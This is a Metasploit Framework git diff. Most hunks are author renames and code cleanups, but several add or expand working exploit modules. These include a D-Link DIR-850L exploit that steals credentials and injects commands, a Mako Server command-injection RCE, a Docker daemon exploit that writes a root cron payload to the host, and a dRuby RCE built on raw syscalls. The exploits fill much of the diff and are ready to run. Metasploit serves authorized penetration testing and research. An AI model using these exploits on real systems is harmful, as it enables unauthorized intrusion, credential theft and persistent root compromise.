b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb index 8aaad8f9ef..41b7e500ee 100644 --- a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary to be exploitable where WebDAV is enabled on the IIS6 server, and any protected folder requires either Basic, Digest or NTLM authentication. }, - 'Author' => [ 'et', 'patrick' ], + 'Author' => [ 'et', 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ @@ -83,7 +83,7 @@ class MetasploitModule < Msf::Auxiliary 'ctype' => 'application/xml', 'headers' => { - #'Translate' => 'f', # Not required in PROPFIND, only GET - patrickw 20091518 + #'Translate' => 'f', # Not required in PROPFIND, only GET - aushack 20091518 }, 'data' => webdav_req + "\r\n\r\n", }, 20) diff --git a/modules/auxiliary/scanner/http/soap_xml.rb b/modules/auxiliary/scanner/http/soap_xml.rb index 5e220ccb69..5d6f78714c 100644 --- a/modules/auxiliary/scanner/http/soap_xml.rb +++ b/modules/auxiliary/scanner/http/soap_xml.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Auxiliary This module attempts to brute force SOAP/XML requests to uncover hidden methods. ), - 'Author' => ['patrick'], + 'Author' => ['aushack'], 'License' => MSF_LICENSE)) register_options( diff --git a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb index 67950be71b..806752145c 100644 --- a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb +++ b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb @@ -28,7 +28,7 @@ class MetasploitModule < Msf::Auxiliary ASSETBEGIN and ASSETEND values for greater results, or set VERBOSE. Information gathered may be used for later bruteforce attacks. }, - 'Author' => [ 'Troy Rose ', 'patrick' ], + 'Author' => [ 'Troy Rose ', 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/scanner/mongodb/mongodb_login.rb b/modules/auxiliary/scanner/mongodb/mongodb_login.rb index 532b649332..092258531f 100644 --- a/modules/auxiliary/scanner/mongodb/mongodb_login.rb +++ b/modules/auxiliary/scanner/mongodb/mongodb_login.rb @@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary :exploited_at => Time.now.utc, :info => "Mongo server has no authentication." ) - print_good("Mongo server #{ip.to_s} dosn't use authentication") + print_good("Mongo server #{ip.to_s} doesn't use authentication") end disconnect rescue ::Exception => e diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb index 4d62a29ef2..05d8e86152 100644 --- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb +++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb @@ -39,6 +39,7 @@ class MetasploitModule < Msf::Auxiliary register_options( [ + OptInt.new('MinRID', [ false, "Starting RID to check", 500 ]), OptInt.new('MaxRID', [ false, "Maximum RID to check", 4000 ]) ], self.class @@ -140,7 +141,6 @@ class MetasploitModule < Msf::Auxiliary # Fingerprint a single host def run_host(ip) - [[139, false], [445, true]].each do |info| @rport = info[0] @@ -227,8 +227,10 @@ class MetasploitModule < Msf::Auxiliary domain_sid || host_sid end + min_rid = datastore['MinRID'] # Brute force through a common RID range - 500.upto(datastore['MaxRID'].to_i) do |rid| + + min_rid.upto(datastore['MaxRID']) do |rid| stub = phandle + @@ -244,7 +246,6 @@ class MetasploitModule < Msf::Auxiliary NDR.long(1) + NDR.long(0) - dcerpc.call(15, stub) resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil @@ -295,6 +296,4 @@ class MetasploitModule < Msf::Auxiliary end end end - - end diff --git a/modules/auxiliary/scanner/varnish/varnish_cli_login.rb b/modules/auxiliary/scanner/varnish/varnish_cli_login.rb index c5cf4dba78..c5c16614b7 100644 --- a/modules/auxiliary/scanner/varnish/varnish_cli_login.rb +++ b/modules/auxiliary/scanner/varnish/varnish_cli_login.rb @@ -27,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary ], 'Author' => [ - 'patrick', #original module + 'aushack', #original module 'h00die ' #updates and standardizations ], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index f51b978acc..82c323aadd 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -153,7 +153,7 @@ class MetasploitModule < Msf::Auxiliary icmp_response, contents = icmp_packet(packet, datastore['RESP_START']) if not icmp_response - raise RuntimeError ,"Could not build ICMP response" + raise "Could not build ICMP response" else # send response packet icmp_pkt send_icmp(icmp_response, contents) @@ -172,7 +172,7 @@ class MetasploitModule < Msf::Auxiliary icmp_response, contents = icmp_packet(packet, datastore['RESP_END']) if not icmp_response - raise RuntimeError , "Could not build ICMP response" + raise "Could not build ICMP response" else # send response packet icmp_pkt send_icmp(icmp_response, contents) @@ -192,7 +192,7 @@ class MetasploitModule < Msf::Auxiliary icmp_response, contents = icmp_packet(packet, datastore['RESP_CONT']) if not icmp_response - raise RuntimeError , "Could not build ICMP response" + raise "Could not build ICMP response" else # send response packet icmp_pkt send_icmp(icmp_response, contents) diff --git a/modules/auxiliary/spoof/arp/arp_poisoning.rb b/modules/auxiliary/spoof/arp/arp_poisoning.rb index d79ce44402..d326baacbf 100644 --- a/modules/auxiliary/spoof/arp/arp_poisoning.rb +++ b/modules/auxiliary/spoof/arp/arp_poisoning.rb @@ -72,8 +72,8 @@ class MetasploitModule < Msf::Auxiliary @interface = get_interface_guid(@interface) @smac = datastore['SMAC'] @smac ||= get_mac(@interface) if @netifaces - raise RuntimeError ,'SMAC is not defined and can not be guessed' unless @smac - raise RuntimeError ,'Source MAC is not in correct format' unless is_mac?(@smac) + raise 'SMAC is not defined and can not be guessed' unless @smac + raise 'Source MAC is not in correct format' unless is_mac?(@smac) @sip = datastore['LOCALSIP'] @sip ||= get_ipv4_addr(@interface) if @netifaces @@ -162,7 +162,7 @@ class MetasploitModule < Msf::Auxiliary def arp_poisoning lsmac = datastore['LOCALSMAC'] || @smac - raise RuntimeError ,'Local Source Mac is not in correct format' unless is_mac?(lsmac) + raise 'Local Source Mac is not in correct format' unless is_mac?(lsmac) dhosts_range = Rex::Socket::RangeWalker.new(datastore['DHOSTS']) @dhosts = [] @@ -199,7 +199,7 @@ class MetasploitModule < Msf::Auxiliary end Kernel.select(nil, nil, nil, 0.50) end - raise RuntimeError, "No hosts found" unless @dsthosts_cache.length > 0 + raise "No hosts found" unless @dsthosts_cache.length > 0 # Build the local src hosts cache if datastore['BIDIRECTIONAL'] @@ -236,7 +236,7 @@ class MetasploitModule < Msf::Auxiliary end Kernel.select(nil, nil, nil, 0.50) end - raise RuntimeError, "No hosts found" unless @srchosts_cache.length > 0 + raise "No hosts found" unless @srchosts_cache.length > 0 end if datastore['AUTO_ADD'] diff --git a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb index fbd10a7dbe..5cdcc5284a 100644 --- a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb +++ b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote module only supports command line payloads, as the httpd process kills the reverse/bind shell spawn after the HTTP 200 OK response. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/linux/http/dlink_dir850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_dir850l_unauth_exec.rb new file mode 100644 index 0000000000..29645df2c8 --- /dev/null +++ b/modules/exploits/linux/http/dlink_dir850l_unauth_exec.rb @@ -0,0 +1,230 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'openssl' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DIR-850L (Un)authenticated OS Command Exec', + 'Description' => %q{ + This module leverages an unauthenticated credential disclosure + vulnerability to then execute arbitrary commands on DIR-850L routers + as an authenticated user. Unable to use Meterpreter payloads. + }, + 'Author' => [ + 'Mumbai', # https://github.com/realoriginal (module) + 'Zdenda' # vuln discovery + ], + 'References' => [ + ['URL', 'https://www.seebug.org/vuldb/ssvid-96333'], + ['URL', 'https://blogs.securiteam.com/index.php/archives/3310'], + ], + 'DisclosureDate' => 'Aug 9 2017', + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSBE, + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsbe/shell/reverse_tcp' + }, + 'Privileged' => true, + 'Payload' => { + 'DisableNops' => true, + }, + 'Targets' => [[ 'Automatic', {} ]], + )) + end + + def check + begin + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET' + }) + if res && res.headers['Server'] + auth = res.headers['Server'] + if auth =~ /DIR-850L/ + if auth =~ /WEBACCESS\/1\.0/ + return Exploit::CheckCode::Safe + else + return Exploit::CheckCode::Detected + end + end + end + rescue ::Rex::ConnectionError + return Exploit::CheckCode::Unknown + end + Exploit::CheckCode::Unknown + end + + def report_cred(opts) + service_data = { + address: opts[:ip], + port: opts[:port], + service_name: opts[:service_name], + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + origin_type: :service, + module_fullname: fullname, + username: opts[:user], + private_data: opts[:password], + private_type: :password + }.merge(service_data) + + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::UNTRIED, + proof: opts[:proof] + }.merge(service_data) + + create_credential_login(login_data) + end + + + # some other DIR-8X series routers are vulnerable to this same retrieve creds vuln as well... + # should write an auxiliary module to-do -> WRITE AUXILIARY + def retrieve_creds + begin + xml = "\r\n" + xml << "\r\n" + xml << "\r\n" + xml << " ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml\r\n" + xml << "\r\n" + xml << "" + res = send_request_cgi({ + 'uri' => '/hedwig.cgi', + 'method' => 'POST', + 'encode_params' => false, + 'headers' => { + 'Accept-Encoding' => 'gzip, deflate', + 'Accept' => '*/*' + }, + 'ctype' => 'text/xml', + 'cookie' => "uid=#{Rex::Text.rand_text_alpha_lower(8)}", + 'data' => xml, + }) + if res.body =~ /(.*)<\/password>/ # fixes stack trace issue + parse = res.get_xml_document + username = parse.at('//name').text + password = parse.at('//password').text + vprint_good("#{peer} - Retrieved the username/password combo #{username}/#{password}") + loot = store_loot("dlink.dir850l.login", "text/plain", rhost, res.body) + print_good("#{peer} - Downloaded credentials to #{loot}") + return username, password + else + fail_with(Failure::NotFound, "#{peer} - Credentials could not be obtained") + end + rescue ::Rex::ConnectionError + fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") + end + end + + def retrieve_uid + begin + res = send_request_cgi({ + 'uri' => '/authentication.cgi', + 'method' => 'GET', + }) + parse = res.get_json_document + uid = parse['uid'] + challenge = parse['challenge'] + return uid, challenge + rescue ::Rex::ConnectionError + fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") + end + end + + def login(username, password) + uid, challenge = retrieve_uid + begin + hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase + send_request_cgi({ + 'uri' => '/authentication.cgi', + 'method' => 'POST', + 'data' => "id=#{username}&password=#{hash}", + 'cookie' => "uid=#{uid}" + }) + return uid + rescue ::Rex::ConnectionError + fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") + end + end + + def execute_command(cmd, opts) + uid = login(@username, @password) # reason being for loop is cause UID expires for some reason after executing 1 command + payload = "\r\n" + payload << "\r\n" + payload << "\r\n" + payload << " DEVICE.TIME\r\n" + payload << " \r\n" + payload << " \r\n" + payload << "\r\n" + payload << "" + begin + # save configuration + res = send_request_cgi({ + 'uri' => '/hedwig.cgi', + 'method' => 'POST', + 'ctype' => 'text/xml', + 'data' => payload, + 'cookie' => "uid=#{uid}" + }) + # execute configuration + res = send_request_cgi({ + 'uri' => '/pigwidgeon.cgi', + 'method' => 'POST', + 'data' => 'ACTIONS=SETCFG,ACTIVATE', + 'cookie' => "uid=#{uid}" + }) + return res + rescue ::Rex::ConnectionError + fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") + end + end + + + def exploit + print_status("#{peer} - Connecting to target...") + + unless check == Exploit::CheckCode::Detected + fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable url") + end + # + # Information Retrieval, obtains creds and logs in + # + @username, @password = retrieve_creds + execute_cmdstager( + :flavor => :wget, + :linemax => 200 + ) + end +end diff --git a/modules/exploits/linux/http/docker_daemon_tcp.rb b/modules/exploits/linux/http/docker_daemon_tcp.rb index c733b2440c..c77a5e8837 100644 --- a/modules/exploits/linux/http/docker_daemon_tcp.rb +++ b/modules/exploits/linux/http/docker_daemon_tcp.rb @@ -33,9 +33,13 @@ class MetasploitModule < Msf::Exploit::Remote ], 'DisclosureDate' => 'Jul 25, 2017', 'Targets' => [ + [ 'Linux x64', { + 'Arch' => ARCH_X64, + 'Platform' => 'linux' + }], [ 'Python', { - 'Platform' => 'python', 'Arch' => ARCH_PYTHON, + 'Platform' => 'python', 'Payload' => { 'Compat' => { 'ConnectionType' => 'reverse noconn none tunnel' @@ -43,13 +47,14 @@ class MetasploitModule < Msf::Exploit::Remote } }] ], - 'DefaultOptions' => { 'WfsDelay' => 180, 'Payload' => 'python/meterpreter/reverse_tcp' }, + 'Payload' => { 'Space' => 65000, 'DisableNops' => true }, + 'DefaultOptions' => { 'WfsDelay' => 180 }, 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(2375), - OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]), + OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'alpine:latest' ]), OptString.new('CONTAINER_ID', [ false, 'container id you would like']) ] ) @@ -57,22 +62,24 @@ class MetasploitModule < Msf::Exploit::Remote def check_image(image_id) vprint_status("Check if images exist on the target host") - res = send_request_raw( + res = send_request_cgi( 'method' => 'GET', - 'uri' => normalize_uri('images', 'json') + 'uri' => normalize_uri('images', 'json'), + 'ctype' => 'application/json' ) - return unless res and res.code == 200 and res.body.include? image_id + return unless res && res.code == 200 && res.body.include?(image_id) res end def pull_image(image_id) print_status("Trying to pulling image from docker registry, this may take a while") - res = send_request_raw( + res = send_request_cgi( 'method' => 'POST', - 'uri' => normalize_uri('images', 'create?fromImage=' + image_id) + 'uri' => normalize_uri('images', 'create?fromImage=' + image_id), + 'ctype' => 'application/json' ) - return unless res.code == 200 + return unless res && res.code == 200 res end @@ -88,12 +95,17 @@ class MetasploitModule < Msf::Exploit::Remote echo_cron_path = mnt_path + cron_path echo_payload_path = mnt_path + payload_path - cron_command = "python #{payload_path}" - payload_data = payload.raw + case target + when targets[0] # linux + command = "echo #{Rex::Text.encode_base64(payload.encoded_exe)} | base64 -d > #{echo_payload_path} \&\& chmod +x #{echo_payload_path} \&\& " + cron_command = payload_path + when targets[1] # python + command = "echo \"#{payload.raw}\" >> #{echo_payload_path} \&\& " + cron_command = "python #{payload_path}" + end - command = "echo \"#{payload_data}\" >> #{echo_payload_path} && " - command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} && " - command << "echo \"\" >> #{echo_cron_path} && " + command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} \&\& " + command << "echo \"\" >> #{echo_cron_path} \&\& " command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}" command @@ -108,25 +120,29 @@ class MetasploitModule < Msf::Exploit::Remote 'HostConfig' => { 'Binds' => [ '/:' + mnt_path - ] + ], + 'Privileged' => true, + 'UsernsMode' => 'host' } } end def del_container(container_id) - send_request_raw( + send_request_cgi( { 'method' => 'DELETE', - 'uri' => normalize_uri('containers', container_id) + 'uri' => normalize_uri('containers', container_id), + 'ctype' => 'application/json' }, 1 # timeout ) end def check - res = send_request_raw( + res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri('containers', 'json'), + 'ctype' => 'application/json', 'headers' => { 'Accept' => 'application/json' } ) @@ -135,7 +151,7 @@ class MetasploitModule < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - if res and res.code == 200 and res.headers['Server'].include? 'Docker' + if res && res.code == 200 && res.headers['Server'].include?('Docker') return Exploit::CheckCode::Vulnerable end @@ -161,10 +177,10 @@ class MetasploitModule < Msf::Exploit::Remote container_id = make_container_id # create container - res_create = send_request_raw( + res_create = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri('containers', 'create?name=' + container_id), - 'headers' => { 'Content-Type' => 'application/json' }, + 'ctype' => 'application/json', 'data' => make_container(mnt_path, cron_path, payload_path).to_json ) fail_with(Failure::Unknown, 'Failed to create the docker container') unless res_create && res_create.code == 201 @@ -173,25 +189,27 @@ class MetasploitModule < Msf::Exploit::Remote register_files_for_cleanup(cron_path, payload_path) # start container - send_request_raw( + send_request_cgi( { 'method' => 'POST', - 'uri' => normalize_uri('containers', container_id, 'start') + 'uri' => normalize_uri('containers', container_id, 'start'), + 'ctype' => 'application/json' }, 1 # timeout ) # wait until container stopped vprint_status("Waiting until the docker container stopped") - res_wait = send_request_raw( + res_wait = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri('containers', container_id, 'wait'), + 'ctype' => 'application/json', 'headers' => { 'Accept' => 'application/json' } ) # delete container deleted_container = false - if res_wait.code == 200 + if res_wait && res_wait.code == 200 vprint_status("The docker container has been stopped, now trying to remove it") del_container(container_id) deleted_container = true diff --git a/modules/exploits/linux/http/netgear_dgn1000_setup_unauth_exec.rb b/modules/exploits/linux/http/netgear_dgn1000_setup_unauth_exec.rb index a16546c153..ead3740f3c 100644 --- a/modules/exploits/linux/http/netgear_dgn1000_setup_unauth_exec.rb +++ b/modules/exploits/linux/http/netgear_dgn1000_setup_unauth_exec.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote DGN2000v1 models. }, 'Author' => [ - 'Mumbai ', # module + 'Mumbai', # https://github.com/realoriginal (module) 'Robort Palerie ' # vuln discovery ], 'References' => [ diff --git a/modules/exploits/linux/http/piranha_passwd_exec.rb b/modules/exploits/linux/http/piranha_passwd_exec.rb index ba80ef54c8..928e5e0576 100644 --- a/modules/exploits/linux/http/piranha_passwd_exec.rb +++ b/modules/exploits/linux/http/piranha_passwd_exec.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote /piranha/secure/passwd.php3 script. The package installs with a default user and password of piranha:q which was exploited in the wild. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/linux/imap/imap_uw_lsub.rb b/modules/exploits/linux/imap/imap_uw_lsub.rb index 9a889be080..2a87b8a174 100644 --- a/modules/exploits/linux/imap/imap_uw_lsub.rb +++ b/modules/exploits/linux/imap/imap_uw_lsub.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote This vulnerability can only be exploited with a valid username and password. }, - 'Author' => [ 'patrick', 'jduck' ], + 'Author' => [ 'aushack', 'jduck' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb index b4c8577fef..8eedfe4403 100644 --- a/modules/exploits/linux/misc/drb_remote_codeexec.rb +++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb @@ -8,6 +8,8 @@ require 'drb/drb' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking + include Msf::Exploit::FileDropper + def initialize(info = {}) super(update_info(info, 'Name' => 'Distributed Ruby Remote Code Execution', @@ -31,30 +33,26 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [ - ['Automatic', {}], + ['Automatic', { method: 'auto'}], + ['Trap', { method: 'trap'}], + ['Eval', { method: 'instance_eval'}], + ['Syscall', { method: 'syscall'}], ], 'DisclosureDate' => 'Mar 23 2011', 'DefaultTarget' => 0)) - register_options( [ - OptString.new('URI', [true, "The dRuby URI of the target host (druby://host:port)", ""]), + OptString.new('URI', [false, "The URI of the target host (druby://host:port) (overrides RHOST/RPORT)", nil]), + Opt::RHOST(nil, false), + Opt::RPORT(8787) ]) end - def exploit - serveruri = datastore['URI'] - DRb.start_service - p = DRbObject.new_with_uri(serveruri) - class << p - undef :send - end - - p.send(:trap, 23, :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend") - # syscall to decide whether it's 64 or 32 bit: - # it's getpid on 32bit which will succeed, and writev on 64bit - # which will fail due to missing args + def method_trap(p) + p.send(:trap, 23, + :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend") + # Decide if this is running on an x86 or x64 target, using the kill(2) syscall begin pid = p.send(:syscall, 20) p.send(:syscall, 37, pid, 23) @@ -65,4 +63,89 @@ class MetasploitModule < Msf::Exploit::Remote end p.send(:my_eval, payload.encoded) end + + def method_instance_eval(p) + p.send(:instance_eval,"Kernel.fork { `#{payload.encoded}` }") + end + + def method_syscall(p) + filename = "." + Rex::Text.rand_text_alphanumeric(16) + + begin + # Decide if this is running on an x86 or x64 target. + # This syscall number is getpid on x86, which will succeed, + # or writev on x64, which will fail due to missing args. + j = p.send(:syscall, 20) + # syscall open + i = p.send(:syscall, 8, filename, 0700) + # syscall write + p.send(:syscall, 4, i, "#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10) + # syscall close + p.send(:syscall, 6, i) + # syscall fork + p.send(:syscall, 2) + # syscall execve + p.send(:syscall, 11, filename, 0, 0) + print_status("attempting x86 execve of #{filename}") + + # likely x64 + rescue Errno::EBADF + # syscall creat + i = p.send(:syscall, 85, filename, 0700) + # syscall write + p.send(:syscall, 1, i, "#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10) + # syscall close + p.send(:syscall, 3, i) + # syscall fork + p.send(:syscall, 57) + # syscall execve + p.send(:syscall, 59, filename, 0, 0) + print_status("attempting x64 execve of #{filename}") + end + + register_file_for_cleanup(filename) if filename + end + + def exploit + if !datastore['URI'].blank? && !datastore['RHOST'].blank? + print_error("URI and RHOST are specified, unset one") + return + end + + if datastore['URI'].blank? && datastore['RHOST'].blank? + print_error("neither URI nor RHOST are specified, set one") + return + end + + unless datastore['URI'].blank? + serveruri = datastore['URI'] + (datastore['RHOST'], datastore['RPORT']) = serveruri.sub(/druby:\/\//i, '').split(':') + else + serveruri = "druby://#{datastore['RHOST']}:#{datastore['RPORT']}" + end + + DRb.start_service + p = DRbObject.new_with_uri(serveruri) + class << p + undef :send + end + + if target[:method] == 'auto' + methods = ["instance_eval", "syscall", "trap"] + else + methods = [target[:method]] + end + + methods.each do |method| + begin + print_status("Trying to exploit #{method} method") + send("method_" + method, p) + handler(nil) + break + rescue SecurityError, DRb::DRbConnError, NoMethodError + print_warning("Target is not vulnerable to #{method} method") + end + end + + end end diff --git a/modules/exploits/linux/misc/gld_postfix.rb b/modules/exploits/linux/misc/gld_postfix.rb index 32938f148d..39f9808be1 100644 --- a/modules/exploits/linux/misc/gld_postfix.rb +++ b/modules/exploits/linux/misc/gld_postfix.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote GLD <= 1.4 greylisting daemon for Postfix. By sending an overly long string the stack can be overwritten. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'Arch' => ARCH_X86, 'Platform' => 'linux', 'References' => diff --git a/modules/exploits/linux/smtp/haraka.py b/modules/exploits/linux/smtp/haraka.py index 7033d90ef2..59dff0bb03 100755 --- a/modules/exploits/linux/smtp/haraka.py +++ b/modules/exploits/linux/smtp/haraka.py @@ -72,6 +72,7 @@ def send_mail(to, mailserver, cmd, mfrom, port): except smtplib.SMTPDataError as err: if err[0] == 450: module.log("Triggered bug in target server (%s)"%err[1], 'good') + s.close() return(True) module.log("Bug not triggered in target server", 'error') module.log("it may not be vulnerable or have the attachment plugin activated", 'error') diff --git a/modules/exploits/multi/handler.rb b/modules/exploits/multi/handler.rb index 0d528c7a77..e436abba9d 100644 --- a/modules/exploits/multi/handler.rb +++ b/modules/exploits/multi/handler.rb @@ -34,7 +34,6 @@ class MetasploitModule < Msf::Exploit::Remote 'Arch' => ARCH_ALL, 'Targets' => [ [ 'Wildcard Target', {} ] ], 'DefaultTarget' => 0, - 'Stance' => Msf::Exploit::Stance::Passive ) ) @@ -42,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote [ OptBool.new( "ExitOnSession", - [ true, "Return from the exploit after a session has been created", false ] + [ true, "Return from the exploit after a session has been created", true ] ), OptInt.new( "ListenerTimeout", @@ -58,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote loop do break if session_created? && datastore['ExitOnSession'] break if timeout > 0 && (stime + timeout < Time.now.to_f) - sleep(1) + Rex::ThreadSafe.sleep(1) end end end diff --git a/modules/exploits/multi/http/makoserver_cmd_exec.rb b/modules/exploits/multi/http/makoserver_cmd_exec.rb new file mode 100644 index 0000000000..9355b7b48c --- /dev/null +++ b/modules/exploits/multi/http/makoserver_cmd_exec.rb @@ -0,0 +1,129 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Mako Server v2.5, 2.6 OS Command Injection RCE', + 'Description' => %q{ + This module exploits a vulnerability found in Mako Server v2.5, 2.6. + It's possible to inject arbitrary OS commands in the Mako Server + tutorial page through a PUT request to save.lsp. + + Attacker input will be saved on the victims machine and can + be executed by sending a GET request to manage.lsp. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'John Page (hyp3rlinx) - Beyond Security SecuriTeam Secure Disclosure', # Vulnerability discovery & PoC + 'Steven Patterson (Shogun Lab) ' # Metasploit module + ], + 'References' => + [ + ['EDB', '42683'], + ['URL', 'https://blogs.securiteam.com/index.php/archives/3391'] + ], + 'Arch' => ARCH_CMD, + 'Platform' => %w[win unix], + 'Targets' => + [ + ['Mako Server v2.5, 2.6', {}] + ], + 'DefaultTarget' => 0, + 'Privileged' => false, + 'DisclosureDate' => 'Sep 3 2017')) + + register_options( + [ + OptString.new('TARGETURI', [true, 'URI path to the Mako Server app', '/']) + ] + ) + end + + def check + vprint_status('Trying to detect running Mako Server and necessary files...') + + # Send GET request to determine existence of save.lsp page + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'examples/save.lsp') + }, 20) + + # If response does not include "MakoServer.net", target is not viable. + if res.headers['Server'] !~ /MakoServer\.net/ + vprint_warning('Target is not a Mako Server.') + return CheckCode::Safe + end + + if res.body + if res.body.include?('Incorrect usage') + # We are able to determine that the server has a save.lsp page and + # returns the correct output. + vprint_status('Mako Server save.lsp returns correct ouput.') + return CheckCode::Appears + else + # The page exists, but is not returning the expected output. + # May be a different version? + vprint_warning('Mako Server save.lsp did not return expected output.') + return CheckCode::Detected + end + else + # The above checks failed and exploitability could not be determined. + vprint_error('Unable to determine exploitability, save.lsp not found.') + return CheckCode::Unknown + end + + CheckCode::Safe + end + + def exploit + print_status('Sending payload to target...') + + # The double square brackets helps to ensure single/double quotes + # in cmd payload do not interfere with syntax of os.execute Lua function. + cmd = %{os.execute([[#{payload.encoded}]])} + + # If users want to troubleshoot their cmd payloads, they can see the + # Lua function with params that the module uses in a more verbose mode. + vprint_status("Now executing the following command: #{cmd}") + + # Send a PUT request to save.lsp with command payload + begin + vprint_status('Sending PUT request to save.lsp...') + send_request_cgi({ + 'method' => 'PUT', + 'uri' => normalize_uri(target_uri.path, 'examples/save.lsp'), + 'ctype' => 'text/plain', + 'data' => cmd, + 'vars_get' => { + 'ex' => '2.1' + } + }, 20) + rescue StandardError => e + fail_with(Failure::NoAccess, "Error: #{e}") + end + + # Send a GET request to manage.lsp with execute set to true + begin + vprint_status('Sending GET request to manage.lsp...') + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'examples/manage.lsp'), + 'vars_get' => { + 'execute' => 'true', + 'ex' => '2.1', + 'type' => 'lua' + } + }, 20) + rescue StandardError => e + fail_with(Failure::NoAccess, "Error: #{e}") + end + end +end diff --git a/modules/exploits/multi/misc/openview_omniback_exec.rb b/modules/exploits/multi/misc/openview_omniback_exec.rb index ae77b0dae1..4d291640ff 100644 --- a/modules/exploits/multi/misc/openview_omniback_exec.rb +++ b/modules/exploits/multi/misc/openview_omniback_exec.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote "unix/cmd/generic" payload and set CMD to your command. You can only pass a small amount of characters (4) to the command line on Windows. }, - 'Author' => [ 'hdm', 'patrick' ], + 'Author' => [ 'hdm', 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ @@ -164,7 +164,7 @@ class MetasploitModule < Msf::Exploit::Remote if (target.name =~ /Windows/) - # patrickw + # aushack # # Tested during pen test against Windows 2003 server. # Windows Service details: diff --git a/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb index b742744d91..89b2625eac 100644 